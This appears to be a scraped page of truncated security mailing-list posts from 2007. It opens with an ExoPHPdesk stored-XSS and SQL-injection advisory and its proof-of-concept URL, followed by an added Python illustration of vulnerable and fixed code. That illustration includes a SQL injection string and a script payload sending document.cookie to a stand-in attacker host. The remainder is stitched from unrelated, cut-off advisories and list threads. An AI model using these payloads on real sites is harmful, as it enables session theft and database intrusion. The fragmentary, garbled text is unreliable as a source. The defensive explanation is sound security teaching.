ExoPHPdesk user profile XSS / profile SQL injection
http://exoscripts.com/exohelpdesk
Script code can be injected through the profile-creation page and is stored in the profile. Because the application tracks users with cookies, this stored XSS can be used to steal sessions.
http://example.com/helpdesk/index.php?fn=profile&s=&user=admin' sql here
S
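The two flaws above, reduced to a runnable illustration. This is an added example, not code from the ExoPHPdesk advisory or from the product itself; it assumes the `user` parameter is spliced into a `WHERE username = '...'` clause (the shape implied by the `user=admin' sql here` PoC) and that the profile display name is echoed into HTML unescaped. The `users` table and its rows are constructed for the example.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data: a tiny users table standing in for the helpdesk DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, display_name TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "Site Admin", 1), ("alice", "Alice", 0)],
    )
    return conn


def profile_lookup_vulnerable(conn, user):
    """Assumed vulnerable pattern: the request parameter is concatenated into SQL.
    A value such as  admin' OR '1'='1  closes the quoted literal and widens the WHERE clause."""
    sql = "SELECT username, display_name FROM users WHERE username = '" + user + "'"
    return conn.execute(sql).fetchall()


def profile_lookup_fixed(conn, user):
    """Hardened form: the value travels as a bound parameter and is never parsed as SQL."""
    sql = "SELECT username, display_name FROM users WHERE username = ?"
    return conn.execute(sql, (user,)).fetchall()


def render_profile_vulnerable(display_name):
    """Assumed vulnerable pattern: profile field written straight into the page (stored XSS)."""
    return "<h1>" + display_name + "</h1>"


def render_profile_fixed(display_name):
    """Hardened form: HTML-escape on output so a stored payload renders as text."""
    return "<h1>" + html.escape(display_name, quote=True) + "</h1>"


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR '1'='1"
    print("vulnerable:", profile_lookup_vulnerable(db, payload))   # every row comes back
    print("fixed:     ", profile_lookup_fixed(db, payload))        # no such user: []
    xss = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"
    print(render_profile_vulnerable(xss))   # script tag reaches the browser
    print(render_profile_fixed(xss))        # rendered as inert text
```

Note that the "sql here" position in the PoC URL is exactly the spliced literal shown in `profile_lookup_vulnerable`; whether a given payload also terminates the statement or stacks queries depends on the real query and driver, which the advisory does not show.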
===
Ubuntu Security Notice USN-541-1 November 13, 2007
emacs22 vulnerability
CVE-2007-5795
===
A security issue affects the following Ubuntu releases:
Ubuntu 7.10
This adviso
Florian Echtler wrote:
> As a native German speaker, allow me to clarify: with respect to IP
> communication, the law mandates saving the following information for 6
> months:
>
> - which customer was assigned which IP for what timespan
> - sender mail address, receiver mail address and sender IP
On Tue, 13 Nov 2007 13:07:02 PST, johan beisser said:
> Actually, that's not really part of the issue. The logs don't contain
> context, just who/where/when. While encryption will prevent (one
> hopes) the capability of recovering context, who you talked to is not
> kept private or otherwise
On Nov 13, 2007, at 12:39 PM, Paul Wouters wrote:
Instead of creating noise, one should fix the problem of sending out
plaintext email, and encourage people to use email encryption such as
Enigma for Thunderbird. Encrypt IM conversations with OTR, and via
other ways pro-actively protect ones o
On Nov 11, 2007, at 1:26 PM, Duncan Simpson wrote:
The signal-to-noise logic probably does work, but I am not sure the legal
angle does. If you *deliberately* ran the software that accidentally
downloaded that kiddie porn, the suggested angle might not work.
That's been an ongoing question
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:217
http://www.mandriva.com/security/
___
On Tue, 13 Nov 2007, Florian Echtler wrote:
As a native German speaker, allow me to clarify: with respect to IP
communication, the law mandates saving the following information for 6
months:
- which customer was assigned which IP for what timespan
- sender mail address, receiver mail address an
iDefense Security Advisory 11.12.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 12, 2007
I. BACKGROUND
The Novell Client software provides a workstation with access to Novell
NetWare networks as well as Novell Open Enterprise Server (OES)
services. Novell Clients can access the ful
===
Ubuntu Security Notice USN-540-1 November 13, 2007
flac vulnerability
CVE-2007-4619
===
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
I know this is obvious to everyone on bugtraq, but nobody seems to have told
P.S.Ziegler yet. (He might or might not be aware of these facts.)
If the report is right and logs recording you connecting and obtaining an IP
address are a concern, then you should be terrified already. I suspect that
> If I read the law correctly, it requires retention of "what IP
> connected to another IP" and "which phone number called where." It
> doesn't bother retaining the URL called (my German is rusty, so I may
> be a little off in my interpretation). Connecting to a random IP on a
> random open
Hey all,
After investigating 11g the other day I came across an interesting issue.
During the installation of Oracle 11g and 10g all accounts, including the
SYS and SYSTEM accounts, have their default passwords and only at the end of
the install are the passwords changed. This means that there is a
Hi,
On Saturday, 10 November 2007 at 19:53, Jan Newger wrote:
>
> NO! This is totally WRONG! The only thing which is logged, in the case
> of internet connectivity, is your IP you got from the ISP. Not even
> connections are logged! This is important to understand since many
> people are misinformed
Application: PHP <= 5.2.5
Web Site: http://php.net
Platform: Unix
Bug: Multiple denial of service
Function: gettext library, multiple denial of service
Special condition: default php memory_limit
Tested on: Debian 4.0, Ubuntu, FreeBSD with Suhosin 0.9.6.2
--
Application: PHP <= 5.2.5
Web Site: http://php.net
Platform: Unix
Bug: Denial of service
Function: stream_wrapper_register()
Special condition: default php memory_limit
---
1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credit
After 6 months - fix available for Microsoft DNS cache poisoning
attack
In April this year I discovered a new vulnerability that enables a
DNS cache poisoning attack against the Windows DNS server. Today
(November 13th, 2007), six and a half months after being informed,
Microsoft released a fix f
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:216
http://www.mandriva.com/security/
___
Actually, you've never emailed us.
HTML is stripped from posts, with the exception of admin allowed tags. The
username XSS issue is already being dealt with in the 6.1 release.
Install.php won't do anything, unless you know the username/password/db name
for the system. Admins are told to re
ATC-08 Call For Papers
The 5th International Conference on Autonomic and Trusted Computing, Oslo,
Norway, June 23-25 2008
"Bring Safe, Self-x and Organic Computing Systems into Reality"
Topics include but are not limited to the following:
- Trust Models and Specifications
Models and s
=
INTERNET SECURITY AUDITORS ALERT 2006-004
- Original release date: April 18, 2006
- Last revised: November 13, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 1/5
=
I. VULNERABILITY
---